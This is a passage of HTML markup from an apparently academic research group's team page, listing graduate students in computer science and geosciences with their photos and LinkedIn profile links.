h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-902 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-855 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c111-outer\">\n            <div data-colibri-id=\"182-c111\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c111 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c112\" class=\"d-block style-854 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c112-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c112-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-global-transition-all h-heading style-850 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c113\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-851 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"h-text h-text-component style-902 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c110\" class=\"style-855 style-local-182-c110 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 